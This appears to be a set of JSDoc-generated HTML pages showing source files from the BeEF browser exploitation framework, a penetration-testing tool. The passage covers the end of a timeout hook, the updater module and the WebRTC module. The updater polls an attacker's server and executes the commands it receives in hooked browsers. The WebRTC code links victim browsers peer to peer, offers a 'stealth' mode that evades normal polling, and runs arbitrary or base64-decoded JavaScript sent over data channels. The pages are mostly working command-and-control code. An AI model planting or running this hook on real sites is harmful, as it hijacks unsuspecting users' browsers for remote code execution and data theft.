<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Sometimes there are timing issues and looks like beef_init
* is not called at all (always in cross-origin situations,
* for example calling the hook with jquery getScript,
* or sometimes with event handler injections).
*
* To fix this, we call again beef_init after 1 second.
* Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
* antisnatchor
* @namespace beef.timeout
*/
/**
* @memberof beef.timeout
* @function setTimeout
*/
setTimeout(beef_init, 1000);
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/updater.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: updater.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: updater.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Object in charge of getting new commands from the BeEF framework and execute them.
* The XHR-polling channel is managed here. If WebSockets are enabled,
* websocket.ls is used instead.
* @namespace beef.updater
*/
beef.updater = {
/** XHR-polling timeout. */
xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
/** Hook session name. */
beefhook: "<%= @hook_session_name %>",
/** A lock. */
lock: false,
/** An object containing all values to be registered and sent by the updater. */
objects: new Object(),
/**
* Registers an object to always send when requesting new commands to the framework.
* @param {String} key the name of the object.
* @param {String} value the value of that object.
*
* @example beef.updater.regObject('java_enabled', 'true');
*/
regObject: function(key, value) {
this.objects[key] = escape(value);
},
// Checks for new commands from the framework and runs them.
check: function() {
if(this.lock == false) {
if (beef.logger.running) {
beef.logger.queue();
}
beef.net.flush();
if(beef.commands.length > 0) {
this.execute_commands();
}else {
this.get_commands(); /*Polling*/
}
}
/* The following gives a stupid syntax error in IE, which can be ignored*/
setTimeout(function(){beef.updater.check()}, beef.updater.xhr_poll_timeout);
},
/**
* Gets new commands from the framework.
*/
get_commands: function() {
try {
this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null && response.body.length > 0)
beef.updater.execute_commands();
});
} catch(e) {
this.lock = false;
return;
}
this.lock = false;
},
/**
* Executes the received commands, if any.
*/
execute_commands: function() {
if(beef.commands.length == 0) return;
this.lock = true;
while(beef.commands.length > 0) {
command = beef.commands.pop();
try {
command();
} catch(e) {
beef.debug('execute_commands - command failed to execute: ' + e.message);
// prints the command source to be executed, to better trace errors
// beef.client_debug must be enabled in the main config
beef.debug(command.toString());
}
}
this.lock = false;
}
};
beef.regCmp('beef.updater');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/webrtc.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: webrtc.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: webrtc.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Manage the WebRTC peer to peer communication channels.
* This objects contains all the necessary client-side WebRTC components,
* allowing browsers to use WebRTC to communicate with each other.
* To provide signaling, the WebRTC extension sets up custom listeners.
* /rtcsignal - for sending RTC signalling information between peers
* /rtcmessage - for client-side rtc messages to be submitted back into beef and logged.
*
* To ensure signaling gets back to the peers, the hook.js dynamic construction also includes
* the signalling.
*
* This is all mostly a Proof of Concept
* @namespace beef.webrtc
*/
/**
* To handle multiple peers - we need to have a hash of Beefwebrtc objects. The key is the peer id.
* @memberof beef.webrtc
*/
beefrtcs = {};
/**
* To handle multiple Peers - we have to have a global hash of RTCPeerConnection objects
* these objects persist outside of everything else. The key is the peer id.
* @memberof beef.webrtc
*/
globalrtc = {};
/**
* stealth should only be initiated from one peer - this global variable will contain:
* false - i.e not stealthed; or
* <peerid> - i.e. the id of the browser which initiated stealth mode
* @memberof beef.webrtc
*/
rtcstealth = false;
/**
* To handle multiple event channels - we need to have a global hash of these. The key is the peer id
* @memberof beef.webrtc
*/
rtcrecvchan = {};
/**
* Beefwebrtc object - wraps everything together for a peer connection
* One of these per peer connection, and will be stored in the beefrtc global hash
* @memberof beef.webrtc
* @param initiator
* @param peer
* @param turnjson
* @param stunservers
* @param verbparam
*/
function Beefwebrtc(initiator,peer,turnjson,stunservers,verbparam) {
this.verbose = typeof verbparam !== 'undefined' ? verbparam : false; // whether this object is verbose or not
this.initiator = typeof initiator !== 'undefined' ? initiator : 0; // if 1 - this is the caller; if 0 - this is the receiver
this.peerid = typeof peer !== 'undefined' ? peer : null; // id of this rtc peer
this.turnjson = turnjson; // set of TURN servers in the format:
// {"username": "<username", "password": "<password>", "uris": [
// "turn:<ip>:<port>?transport=<udp/tcp>",
// "turn:<ip>:<port>?transport=<udp/tcp>"]}
this.started = false; // Has signaling / dialing started for this peer
this.gotanswer = false; // For the caller - this determines whether they have received an SDP answer from the receiver
this.turnDone = false; // does the pcConfig have TURN servers added to it?
this.signalingReady = false; // the initiator (Caller) is always ready to signal. So this sets to true during init
// the receiver will set this to true once it receives an SDP 'offer'
this.msgQueue = []; // because the handling of SDP signals may happen in any order - we need a queue for them
this.pcConfig = null; // We set this during init
this.pcConstraints = {"optional": [{"googImprovedWifiBwe": true}]} // PeerConnection constraints
this.offerConstraints = {"optional": [], "mandatory": {}}; // Default SDP Offer Constraints - used in the caller
this.sdpConstraints = {'optional': [{'RtpDataChannels':true}]}; // Default SDP Constraints - used by caller and receiver
this.gatheredIceCandidateTypes = { Local: {}, Remote: {} }; // ICE Candidates
this.allgood = false; // Is this object / peer connection with the nominated peer ready to go?
this.dataChannel = null; // The data channel used by this peer
this.stunservers = stunservers; // set of STUN servers, in the format:
// ["stun:stun.l.google.com:19302","stun:stun1.l.google.com:19302"]
}
/**
* Initialize the object
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.initialize = function() {
if (this.peerid == null) {
return 0; // no peerid - NO DICE
}
// Initialise the pcConfig hash with the provided stunservers
var stuns = JSON.parse(this.stunservers);
this.pcConfig = {"iceServers": [{"urls":stuns, "username":"user",
"credential":"pass"}]};
// We're not getting the browsers to request their own TURN servers, we're specifying them through BeEF
// this.forceTurn(this.turnjson);
this.turnDone = true;
// Caller is always ready to create peerConnection.
this.signalingReady = this.initiator;
// Start .. maybe
this.maybeStart();
// If the window is closed, send a signal to beef .. this is not all that great, so just commenting out
// window.onbeforeunload = function() {
// this.sendSignalMsg({type: 'bye'});
// }
return 1; // because .. yeah .. we had a peerid - this is good yar.
}
/**
* Forces the TURN configuration (we can't query that computeengine thing because it's CORS is restrictive)
* These values are now simply passed in from the config.yaml for the webrtc extension
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.forceTurn = function(jason) {
var turnServer = JSON.parse(jason);
var iceServers = createIceServers(turnServer.uris,
turnServer.username,
turnServer.password);
if (iceServers !== null) {
this.pcConfig.iceServers = this.pcConfig.iceServers.concat(iceServers);
}
beef.debug("Got TURN servers, will try and maybestart again..");
this.turnDone = true;
this.maybeStart();
}
/**
* Try and establish the RTC connection
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.createPeerConnection = function() {
beef.debug('Creating RTCPeerConnnection with the following options:\n' +
' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
try {
// Create an RTCPeerConnection via the polyfill (webrtcadapter.js).
globalrtc[this.peerid] = new RTCPeerConnection(this.pcConfig, this.pcConstraints);
globalrtc[this.peerid].onicecandidate = this.onIceCandidate;
beef.debug('Created RTCPeerConnnection with the following options:\n' +
' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
} catch (e) {
beef.debug('Failed to create PeerConnection, exception: ');
beef.debug(e);
return;
}
// Assign event handlers to signalstatechange, iceconnectionstatechange, datachannel etc
globalrtc[this.peerid].onsignalingstatechange = this.onSignalingStateChanged;
globalrtc[this.peerid].oniceconnectionstatechange = this.onIceConnectionStateChanged;
globalrtc[this.peerid].ondatachannel = this.onDataChannel;
this.dataChannel = globalrtc[this.peerid].createDataChannel("sendDataChannel", {reliable:false});
}
/**
* When the PeerConnection receives a new ICE Candidate
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onIceCandidate = function(event) {
var peerid = null;
for (var k in beefrtcs) {
if (beefrtcs[k].allgood === false) {
peerid = beefrtcs[k].peerid;
}
}
beef.debug("Handling onicecandidate event while connecting to peer: " + peerid + ". Event received:");
beef.debug(event);
if (event.candidate) {
// Send the candidate to the peer via the BeEF signalling channel
beefrtcs[peerid].sendSignalMsg({type: 'candidate',
label: event.candidate.sdpMLineIndex,
id: event.candidate.sdpMid,
candidate: event.candidate.candidate});
// Note this ICE candidate locally
beefrtcs[peerid].noteIceCandidate("Local", beefrtcs[peerid].iceCandidateType(event.candidate.candidate));
} else {
beef.debug('End of candidates.');
}
}
/**
* For all rtc signalling messages we receive as part of hook.js polling - we have to process them with this function
* This will either add messages to the msgQueue and try and kick off maybeStart - or it'll call processSignalingMessage
* against the message directly
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.processMessage = function(message) {
beef.debug('Signalling Message - S->C: ' + JSON.stringify(message));
var msg = JSON.parse(message);
if (!this.initiator && !this.started) { // We are currently the receiver AND we have NOT YET received an SDP Offer
beef.debug('processing the message, as a receiver');
if (msg.type === 'offer') { // This IS an SDP Offer
beef.debug('.. and the message is an offer .. ');
this.msgQueue.unshift(msg); // put it on the top of the msgqueue
this.signalingReady = true; // As the receiver, we've now got an SDP Offer, so lets set signalingReady to true
this.maybeStart(); // Lets try and start again - this will end up with calleeStart() getting executed
} else { // This is NOT an SDP Offer - as the receiver, just add it to the queue
beef.debug(' .. the message is NOT an offer .. ');
this.msgQueue.push(msg);
}
} else if (this.initiator && !this.gotanswer) { // We are currently the caller AND we have NOT YET received the SDP Answer
beef.debug('processing the message, as the sender, no answers yet');
if (msg.type === 'answer') { // This IS an SDP Answer
beef.debug('.. and we have an answer ..');
this.processSignalingMessage(msg); // Process the message directly
this.gotanswer = true; // We have now received an answer
//process all other queued message...
while (this.msgQueue.length > 0) {
this.processSignalingMessage(this.msgQueue.shift());
}
} else { // This is NOT an SDP Answer - as the caller, just add it to the queue
beef.debug('.. not an answer ..');
this.msgQueue.push(msg);
}
} else { // For all other messages just drop them in the queue
beef.debug('processing a message, but, not as a receiver, OR, the rtc is already up');
this.processSignalingMessage(msg);
}
}
/**
* Send a signalling message ..
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.sendSignalMsg = function(message) {
var msgString = JSON.stringify(message);
beef.debug('Signalling Message - C->S: ' + msgString);
beef.net.send('/rtcsignal',0,{targetbeefid: this.peerid, signal: msgString});
}
/**
* Used to record ICS candidates locally
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.noteIceCandidate = function(location, type) {
if (this.gatheredIceCandidateTypes[location][type])
return;
this.gatheredIceCandidateTypes[location][type] = 1;
// updateInfoDiv();
}
/**
* When the signalling state changes. We don't actually do anything with this except log it.
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onSignalingStateChanged = function(event) {
beef.debug("Signalling has changed to: " + event.target.signalingState);
}
/**
* When the ICE Connection State changes - this is useful to determine connection statuses with peers.
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onIceConnectionStateChanged = function(event) {
var peerid = null;
for (k in globalrtc) {
if ((globalrtc[k].localDescription.sdp === event.target.localDescription.sdp) && (globalrtc[k].localDescription.type === event.target.localDescription.type)) {
peerid = k;
}
}
beef.debug("ICE with peer: " + peerid + " has changed to: " + event.target.iceConnectionState);
// ICE Connection Status has connected - this is good. Normally means the RTCPeerConnection is ready! Although may still look for
// better candidates or connections
if (event.target.iceConnectionState === 'connected') {
//Send status to peer
window.setTimeout(function() {
beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
beefrtcs[peerid].allgood = true;
},1000);
}
// Completed is similar to connected. Except, each of the ICE components are good, and no more testing remote candidates is done.
if (event.target.iceConnectionState === 'completed') {
window.setTimeout(function() {
beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
beefrtcs[peerid].allgood = true;
},1000);
}
if ((rtcstealth == peerid) && (event.target.iceConnectionState === 'disconnected')) {
//I was in stealth mode, talking back to this peer - but it's gone offline.. come out of stealth
rtcstealth = false;
beefrtcs[peerid].allgood = false;
beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
} else if ((rtcstealth == false) && (event.target.iceConnectionState === 'disconnected')) {
//I was not in stealth, and this peer has gone offline - send a message
beefrtcs[peerid].allgood = false;
beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
}
// We don't handle situations where a stealthed peer loses a peer that is NOT the peer that made it go into stealth
// This is possibly a bad idea - @xntrik
}
/**
* This is the function when a peer tells us to go into stealth by sending a dataChannel message of "!gostealth"
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.goStealth = function() {
//stop the beef updater
rtcstealth = this.peerid; // this is a global variable
beef.updater.lock = true;
this.sendPeerMsg('Going into stealth mode');
setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
}
/**
* This is the actual poller when in stealth, it is global as well because we're using the setTimeout to execute it
* @memberof beef.webrtc
*/
rtcpollPeer = function() {
if (rtcstealth == false) {
//my peer has disabled stealth mode
beef.updater.lock = false;
return;
}
beef.debug('lub dub');
beefrtcs[rtcstealth].sendPeerMsg('Stayin alive'); // This is the heartbeat we send back to the peer that made us stealth
setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
}
/**
* When a data channel has been established - within here is the message handling function as well
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onDataChannel = function(event) {
var peerid = null;
for (k in globalrtc) {
if ((globalrtc[k].localDescription.sdp === event.currentTarget.localDescription.sdp) && (globalrtc[k].localDescription.type === event.currentTarget.localDescription.type)) {
peerid = k;
}
}
beef.debug("Peer: " + peerid + " has just handled the onDataChannel event");
rtcrecvchan[peerid] = event.channel;
// This is the onmessage event handling within the datachannel
rtcrecvchan[peerid].onmessage = function(ev2) {
beef.debug("Received an RTC message from my peer["+peerid+"]: " + ev2.data);
// We've received the command to go into stealth mode
if (ev2.data == "!gostealth") {
if (beef.updater.lock == true) {
setTimeout(function() {beefrtcs[peerid].goStealth()},beef.updater.xhr_poll_timeout * 0.4);
} else {
beefrtcs[peerid].goStealth();
}
// The message to come out of stealth
} else if (ev2.data == "!endstealth") {
if (rtcstealth != null) {
beefrtcs[rtcstealth].sendPeerMsg("Coming out of stealth...");
rtcstealth = false;
}
// Command to perform arbitrary JS (while stealthed)
} else if ((rtcstealth != false) && (ev2.data.charAt(0) == "%")) {
beef.debug('message was a command: '+ev2.data.substring(1) + ' .. and I am in stealth mode');
beefrtcs[rtcstealth].sendPeerMsg("Command result - " + beefrtcs[rtcstealth].execCmd(ev2.data.substring(1)));
// Command to perform arbitrary JS (while NOT stealthed)
} else if ((rtcstealth == false) && (ev2.data.charAt(0) == "%")) {
beef.debug('message was a command - we are not in stealth. Command: '+ ev2.data.substring(1));
beefrtcs[peerid].sendPeerMsg("Command result - " + beefrtcs[peerid].execCmd(ev2.data.substring(1)));
// B64d command from the /cmdexec API
} else if (ev2.data.charAt(0) == "@") {
beef.debug('message was a b64d command');
var fn = new Function(atob(ev2.data.substring(1)));
fn();
if (rtcstealth != false) { // force stealth back on ?
beef.updater.execute_commands(); // FORCE execution while stealthed
beef.updater.lock = true;
}
// Just a plain text message .. (while stealthed)
} else if (rtcstealth != false) {
beef.debug('received a message, apparently we are in stealth - so just send it back to peer['+rtcstealth+']');
beefrtcs[rtcstealth].sendPeerMsg(ev2.data);
// Just a plan text message (while NOT stealthed)
} else {
beef.debug('received a message from peer['+peerid+'] - sending it back to beef');
beef.net.send('/rtcmessage',0,{peerid: peerid, message: ev2.data});
}
}
}
/**
* How the browser executes received JS (this is pretty hacky)
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.execCmd = function(input) {
var fn = new Function(input);
var res = fn();
return res.toString();
}
/**
* Shortcut function to SEND a data messsage
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.sendPeerMsg = function(msg) {
beef.debug('sendPeerMsg to ' + this.peerid);
this.dataChannel.send(msg);
}
/**
* Try and initiate, will check that system hasn't started, and that signaling is ready, and that TURN servers are ready
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.maybeStart = function() {
beef.debug("maybe starting ... ");
if (!this.started && this.signalingReady && this.turnDone) {
beef.debug('Creating PeerConnection.');
this.createPeerConnection();
this.started = true;
if (this.initiator) {
beef.debug("Making the call now .. bzz bzz");
this.doCall();
} else {
beef.debug("Receiving a call now .. somebuddy answer da fone?");
this.calleeStart();
}
} else {
beef.debug("Not ready to start just yet..");
}
}
/**
* RTC - create an offer - the caller runs this, while the receiver runs calleeStart()
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.doCall = function() {
var constraints = this.mergeConstraints(this.offerConstraints, this.sdpConstraints);
var self = this;
globalrtc[this.peerid].createOffer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, constraints);
beef.debug('Sending offer to peer, with constraints: \n' +
' \'' + JSON.stringify(constraints) + '\'.');
}
/**
* Helper method to merge SDP constraints
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.mergeConstraints = function(cons1, cons2) {
var merged = cons1;
for (var name in cons2.mandatory) {
merged.mandatory[name] = cons2.mandatory[name];
}
merged.optional.concat(cons2.optional);
return merged;
}
/**
* Sets the local RTC session description, sends this information back (via signalling)
* The caller uses this to set it's local description, and it then has to send this to the peer (via signalling)
* The receiver uses this information too - and vice-versa - hence the signaling
*
*/
Beefwebrtc.prototype.setLocalAndSendMessage = function(sessionDescription) {
var peerid = null;
for (var k in beefrtcs) {
if (beefrtcs[k].allgood === false) {
peerid = beefrtcs[k].peerid;
}
}
beef.debug("For peer: " + peerid + " Running setLocalAndSendMessage...");
globalrtc[peerid].setLocalDescription(sessionDescription, onSetSessionDescriptionSuccess, onSetSessionDescriptionError);
beefrtcs[peerid].sendSignalMsg(sessionDescription);
function onSetSessionDescriptionSuccess() {
beef.debug('Set session description success.');
}
function onSetSessionDescriptionError() {
beef.debug('Failed to set session description');
}
}
/**
* If the browser can't build an SDP
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onCreateSessionDescriptionError = function(error) {
beef.debug('Failed to create session description: ' + error.toString());
}
/**
* If the browser successfully sets a remote description
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onSetRemoteDescriptionSuccess = function() {
beef.debug('Set remote session description successfully');
}
/**
* Check for messages - which includes signaling from a calling peer - this gets kicked off in maybeStart()
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.calleeStart = function() {
// Callee starts to process cached offer and other messages.
while (this.msgQueue.length > 0) {
this.processSignalingMessage(this.msgQueue.shift());
}
}
/**
* Process messages, this is how we handle the signaling messages, such as candidate info, offers, answers
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.processSignalingMessage = function(message) {
if (!this.started) {
beef.debug('peerConnection has not been created yet!');
return;
}
if (message.type === 'offer') {
beef.debug("Processing signalling message: OFFER");
if (navigator.mozGetUserMedia) { // Mozilla shim fuckn shit - since the new
// version of FF - which no longer works
beef.debug("Moz shim here");
globalrtc[this.peerid].setRemoteDescription(
new RTCSessionDescription(message),
function() {
// globalrtc[this.peerid].createAnswer(function(answer) {
// globalrtc[this.peerid].setLocalDescription(
var peerid = null;
for (var k in beefrtcs) {
if (beefrtcs[k].allgood === false) {
peerid = beefrtcs[k].peerid;
}
}
globalrtc[peerid].createAnswer(function(answer) {
globalrtc[peerid].setLocalDescription(
new RTCSessionDescription(answer),
function() {
beefrtcs[peerid].sendSignalMsg(answer);
},function(error) {
beef.debug("setLocalDescription error: " + error);
});
},function(error) {
beef.debug("createAnswer error: " +error);
});
},function(error) {
beef.debug("setRemoteDescription error: " + error);
});
} else {
this.setRemote(message);
this.doAnswer();
}
} else if (message.type === 'answer') {
beef.debug("Processing signalling message: ANSWER");
if (navigator.mozGetUserMedia) { // terrible moz shim - as for the offer
beef.debug("Moz shim here");
globalrtc[this.peerid].setRemoteDescription(
new RTCSessionDescription(message),
function() {},
function(error) {
beef.debug("setRemoteDescription error: " + error);
});
} else {
this.setRemote(message);
}
} else if (message.type === 'candidate') {
beef.debug("Processing signalling message: CANDIDATE");
var candidate = new RTCIceCandidate({sdpMLineIndex: message.label,
candidate: message.candidate});
this.noteIceCandidate("Remote", this.iceCandidateType(message.candidate));
globalrtc[this.peerid].addIceCandidate(candidate, this.onAddIceCandidateSuccess, this.onAddIceCandidateError);
} else if (message.type === 'bye') {
this.onRemoteHangup();
}
}
/**
* Used to set the RTC remote session
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.setRemote = function(message) {
globalrtc[this.peerid].setRemoteDescription(new RTCSessionDescription(message),
this.onSetRemoteDescriptionSuccess, this.onSetSessionDescriptionError);
}
/**
* As part of the processSignalingMessage function, we check for 'offers' from peers. If there's an offer, we answer, as below
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.doAnswer = function() {
beef.debug('Sending answer to peer.');
globalrtc[this.peerid].createAnswer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, this.sdpConstraints);
}
/**
* Helper method to determine what kind of ICE Candidate we've received
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.iceCandidateType = function(candidateSDP) {
if (candidateSDP.indexOf("typ relay ") >= 0)
return "TURN";
if (candidateSDP.indexOf("typ srflx ") >= 0)
return "STUN";
if (candidateSDP.indexOf("typ host ") >= 0)
return "HOST";
return "UNKNOWN";
}
/**
* Event handler for successful addition of ICE Candidates
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onAddIceCandidateSuccess = function() {
beef.debug('AddIceCandidate success.');
}
/**
* Event handler for unsuccessful addition of ICE Candidates
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onAddIceCandidateError = function(error) {
beef.debug('Failed to add Ice Candidate: ' + error.toString());
}
/**
* If a peer hangs up (we bring down the peerconncetion via the stop() method)
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onRemoteHangup = function() {
beef.debug('Session terminated.');
this.initiator = 0;
// transitionToWaiting();
this.stop();
}
/**
* Bring down the peer connection
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.stop = function() {
this.started = false; // we're no longer started
this.signalingReady = false; // signalling isn't ready
globalrtc[this.peerid].close(); // close the RTCPeerConnection option
globalrtc[this.peerid] = null; // Remove it
this.msgQueue.length = 0; // clear the msgqueue
rtcstealth = false; // no longer stealth
this.allgood = false; // allgood .. NAH UH
}
/**
* The actual beef.webrtc wrapper - this exposes only two functions directly - start, and status
* These are the methods which are executed via the custom extension of the hook.js
* @memberof beef.webrtc
*/
beef.webrtc = {
// Start the RTCPeerConnection process
start: function(initiator,peer,turnjson,stunservers,verbose) {
if (peer in beefrtcs) {
// If the RTC peer is not in a good state, try kickng it off again
// This is possibly not the correct way to handle this issue though :/ I.e. we'll now have TWO of these objects :/
if (beefrtcs[peer].allgood == false) {
beefrtcs[peer] = new Beefwebrtc(initiator, peer, turnjson, stunservers, verbose);
beefrtcs[peer].initialize();
}
} else {
// Standard behaviour for new peer connections
beefrtcs[peer] = new Beefwebrtc(initiator,peer,turnjson, stunservers, verbose);
beefrtcs[peer].initialize();
}
},
// Check the status of all my peers ..
status: function(me) {
if (Object.keys(beefrtcs).length > 0) {
for (var k in beefrtcs) {
if (beefrtcs.hasOwnProperty(k)) {
beef.net.send('/rtcmessage',0,{peerid: k, message: "Status checking - allgood: " + beefrtcs[k].allgood});
}
}
} else {
beef.net.send('/rtcmessage',0,{peerid: me, message: "No peers?"});
}
}
}
beef.regCmp('beef.webrtc');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
